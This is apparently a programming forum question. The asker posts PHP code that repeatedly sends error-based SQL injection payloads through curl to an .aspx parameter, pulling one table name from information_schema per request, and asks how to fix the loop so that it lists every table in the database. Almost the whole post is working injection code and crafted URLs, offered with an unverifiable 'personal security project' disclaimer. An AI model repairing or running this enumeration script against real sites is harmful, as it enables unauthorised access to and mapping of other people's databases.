Scanning words with preg_match and adding to CURL query
I'm trying to get all the tables of a particular database in the following
way:
    //get_data($url) is a curl function that returns the data.
    $remove = "''";
    do {
        $returned_content = get_data($url);
        $query = "+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(".$remove.")))--";
        $url = "http://abc.com/a.aspx?param=1'".$query;
        preg_match('~\'(.*?)\'~', $returned_content, $it);
        if ($remove) {
            $remove = $it[0];
        }
        else {
            $remove .= ','.$it[0];
        }
    }
    while ((stripos($returned_content, 'cannot be found') == false) &&
           (stripos($returned_content, 'no row') == false));
The intended purpose of the above code is to build $remove as
'table1','table2','table3' which can be used in the URL to detect other
tables in the database.
However, after the first query, which is this URL:
http://abc.com/a.aspx?param=1'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('')))--
(note the single quotes ('') in the "not in" clause).
The second query is a malformed URL, where the single quotes ('') have disappeared:
http://abc.com/a.aspx?param=1'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+()))--
This leads to an error, and now the preg_match function returns ')', because
the error message says "Incorrect syntax near ')'". This bracket is then
appended to $remove, and from there the whole query goes wrong.
How can I fix this code so that $remove is built correctly and lists all
the tables in the DB?
P.S. I know this looks a lot like SQL Injection, but it is a personal
security project I am pursuing.